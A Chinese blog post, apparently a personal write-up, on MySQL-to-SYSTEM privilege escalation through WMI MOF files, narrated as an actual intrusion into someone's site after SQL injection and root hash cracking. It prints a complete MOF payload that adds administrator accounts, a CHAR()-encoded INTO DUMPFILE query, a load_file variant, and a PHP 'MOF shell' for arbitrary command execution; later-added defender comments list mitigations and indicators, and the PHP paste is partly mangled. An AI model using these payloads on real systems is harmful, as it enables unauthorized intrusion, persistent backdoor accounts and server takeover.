  • Mof提权科普

    今天在拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下来,我做一个mof提权的科普

    这里我对各类mof提权方法进行了综合整理

    首先说一下,无shell情况下的mysql远程mof提权利用方法详解

    就是你注入拿到了数据库的root账号密码,直接进行

    扫到一个站的注入


    在havij中得到mysql数据库中mysql库保存的数据库密码: 


    有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。 
    照样放到坛子里让机油破了 


    感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。 
    在等着密码破解出来的时候顺便nmap了一下 


    意外发现端口改到了1126,给后面省下了不少时间。 
    照常外连试试 


    上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的 
    现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。 
    但是网站上面暴不出路径,看看mysql的路径 
    用select @@basedir;命令可以看到; 


    网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。 
    Mof的科普文很多, 

    mof文件内容为:

    // Defender note: one-line form of the same WMI permanent event subscription that the
    // formatted listing further down shows (an __EventFilter as trigger, an
    // ActiveScriptEventConsumer as action, and a __FilterToConsumerBinding joining them).
    // Once the WMI service compiles it, the subscription is stored in the WMI repository
    // and keeps firing even after the .mof file is gone — which is why the post's clean-up
    // stops winmgmt, deletes the Repository folder and restarts the service.
    #pragma namespace("\\.\root\subscription")instance of __EventFilter as $EventFilter{    EventNamespace = "Root\Cimv2";    Name  = "filtP2";    Query = "Select * From __InstanceModificationEvent "            "Where TargetInstance Isa "Win32_LocalTime" "            "And TargetInstance.Second = 5";    QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{    Name = "consPCSV2";    ScriptingEngine = "JScript";    ScriptText =    "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exe user admin admin /add")"; };instance of __FilterToConsumerBinding{    Consumer   = $Consumer;    Filter = $EventFilter;};

     

    由于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
    先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多";回车"之类的符号。
    然后就想转化为16进制或者asc码这样。
    先试了16进制。
    等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:

     

    -- Defender note: the MOF above, encoded as a CHAR() list so that it survives the
    -- injection point, written with SELECT ... INTO DUMPFILE into the wbem\mof
    -- auto-compile directory. This step needs the MySQL FILE privilege, a
    -- secure_file_priv that does not confine writes, and a server process that can itself
    -- write under system32 — so revoking FILE from application accounts, setting
    -- secure_file_priv, and running mysqld as a low-privileged service account each
    -- break it. Indicator: a .mof file (here nullevt.mof) created under
    -- system32\wbem\mof by the database server process.
    SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97
,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';


    这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。 
    好吧,重新写一遍mof

     

    select char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into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

     

    好了,这样就顺利登进去了;

    改天研究一下一次性完成添加管理员试试

    现在默认它还是会过5s添加一次用户,解决方法就是:
    第一 net stop winmgmt 停止服务,
    第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository
    第三 net start winmgmt 启动服务
    还有其他方法在网盘的文件里面有写。

    一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。

     

     

    第二种

     

    首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -。

    不多说了~。~像名称一样哈~

    首先呢是朋友扔我一shell

    他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql。

    就在网站目录看了下data文件夹习惯性的~

    运气不错。Root。

    居然知道是这东西,上大马。(不知道利用菜刀)

    OK回显成功。

    5.0.67不用说都知道是什么了,这版本基本上udf都可以秒的,但毕竟这里说的是mof所以就用mof提吧。

    先找个可写路径。

    C盘可以,运气不错。

    然后在上传路径传个我们的mof文件

    代码如下:

    // Defender note: a WMI permanent event subscription — three objects in
    // root\subscription: an __EventFilter (the trigger), an ActiveScriptEventConsumer
    // (the action) and a __FilterToConsumerBinding that joins them. Once the WMI service
    // compiles the file, the subscription lives in the WMI repository and keeps firing
    // with or without the .mof, which is why the clean-up given earlier in the post stops
    // winmgmt, deletes the Repository folder and restarts the service. Unexpected
    // consumers/bindings in this namespace are a high-signal hunting indicator
    // (MITRE ATT&CK T1546.003, WMI Event Subscription).
    #pragmanamespace("\\.\root\subscription")

       

    instance of __EventFilter as $EventFilter

    {

       EventNamespace = "Root\Cimv2";

       Name  = "filtP2";

       // Trigger: every Win32_LocalTime modification whose Second field equals 5 —
       // i.e. once per minute (the prose above says "every 5 s", but the query fires
       // only when the seconds value is 5).
       Query = "Select * From __InstanceModificationEvent "

               "Where TargetInstance Isa "Win32_LocalTime" "

               "And TargetInstance.Second = 5";

       QueryLanguage = "WQL";

    };

       

    instance of ActiveScriptEventConsumer as$Consumer

    {

       Name = "consPCSV2";

       ScriptingEngine = "JScript";

       // Action: JScript through WScript.Shell runs the quoted net.exe command line,
       // creating a local account and adding it to Administrators. On the host this
       // shows up as Security events 4720 (account created) and 4732 (member added to a
       // local group), repeating once a minute while the subscription exists.
       ScriptText =

       "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exenet user user$ sword /add & net localgroup administrators user$ /add")";

    };

       

    // Binding activates the subscription; deleting the .mof file alone does not remove it.
    instance of __FilterToConsumerBinding

    {

       Consumer   = $Consumer;

       Filter = $EventFilter;

    };

    生成的账号:user$ 密码为:sword

    这段代码可自行修改。

    接着呢执行命令:selectload_file('C:\RECYCLER\xx.mof') into dumpfile 'c:/windows/system32/wbem/mof/xx.mof';

    OK.。执行命令完成。

    由于权限设置无法直接查询管理员。登陆下就知道了。

    好了mof提权就这样。

    谢谢观看。

    Ps:由于当时提的时候截的几张图,后来管理员把mof的漏洞修复了。所以服务器没了。就这样~

    综合一下 

    还可直接使用mof马进行提权

    但是我经常被杀

    下面贴出代码,直接保存mof.php,即可

    运行的时候点 Read,多运行几次,因为 Read 没有回显说明没有运行成功;如果出现错误,它会有回显的

    <?php
    // Defender note: this is the "MOF shell" the post refers to. As written below it
    //  - stores the MySQL host/user/pass/dbname from the form in cookies (in the clear)
    //    and reads them back from the cookies on the connect/read actions;
    //  - on "Exploit" builds a MOF whose ActiveScriptEventConsumer runs
    //    `cmd /c <cmd> > c:/windows/system32/canimei` and writes it with
    //    SELECT '<payload>' INTO DUMPFILE 'c:/windows/system32/wbem/mof/system.mof';
    //  - on "Read" LOAD_FILE()s that output file and echoes it.
    // What it depends on, and therefore what blocks it: the MySQL FILE privilege, a
    // secure_file_priv that does not confine writes, and a mysqld account able to write
    // under system32 — revoke FILE from application accounts, set secure_file_priv, and
    // run MySQL as a low-privileged service account. Indicators: system.mof and the
    // canimei output file created under system32 by the database server process.
    // Reading notes: $strCmd is echoed into the form before it is ever assigned, and the
    // paste is whitespace-mangled (e.g. `<formaction=`, `<?phpexit;`), so the text is not
    // syntactically intact as shown.
    $path="c:/windows/system32/canimei";session_start();if(!empty($_POST['submit'])){setcookie("connect");setcookie("connect[host]",$_POST['host']);setcookie("connect[user]",$_POST['user']);setcookie("connect[pass]",$_POST['pass']);setcookie("connect[dbname]",$_POST['dbname']);echo "<script>location.href='?action=connect'</script>";}if(empty($_GET["action"])){?><html><head><title>Win MOF Shell</title></head><body><formaction="?action=connect"method="post">Host:<inputtype="text"name="host"value="192.168.200.144:3306"><br/>User:<inputtype="text"name="user"value="root"><br/>Pass:<inputtype="password"name="pass"value="toor"><br/>DB:<inputtype="text"name="dbname"value="mysql"><br/><inputtype="submit"name="submit"value="Submit"><br/></form></body></html><?phpexit;}if($_GET[action]=='connect'){$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])ordie('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>";echo "Cmd:";echo "<input type='text' name='cmd' value='$strCmd'?>";echo "<br>";echo "<br>";echo "<inputtype='submit'value='Exploit'>";echo "</form>";echo "<formaction=''method='post'>";echo "<inputtype='hidden'name='flag'value='flag'>";echo "<inputtype='submit'value=' Read  '>";echo "</form>";if (isset($_POST['cmd'])){$strCmd=$_POST['cmd'];$cmdshell='cmd /c '.$strCmd.'>'.$path;$mofname="c:/windows/system32/wbem/mof/system.mof";$payload = "#pragma namespace("\\\\\\\\.\\\\root\\\\subscription")instance of __EventFilter as $EventFilter{  EventNamespace = "Root\\\\Cimv2";  Name  = "filtP2";  Query = "Select * From __InstanceModificationEvent "      "Where TargetInstance Isa \\"Win32_LocalTime\\" "      "And TargetInstance.Second = 5";  QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{  Name = "consPCSV2";  ScriptingEngine = "JScript";  ScriptText =  "var WSH = new ActiveXObject(\\"WScript.Shell\\")\\nWSH.run(\\"$cmdshell\\")"; };instance of __FilterToConsumerBinding{  Consumer = 
$Consumer;  Filter = $EventFilter;};";mysql_select_db($_COOKIE["connect"]["dbname"],$conn);$sql1="select '$payload' into dumpfile '$mofname';";if(mysql_query($sql1))  echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn);}if(isset($_POST['flag'])){  $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');   $sql2="select load_file("".$path."");";  $result2=mysql_query($sql2);  $num=mysql_num_rows($result2);  while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {    echo "<hr/>";    echo '<pre>'. $row[0].'</pre>';  }  mysql_close($conn);}}?>

  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154602.html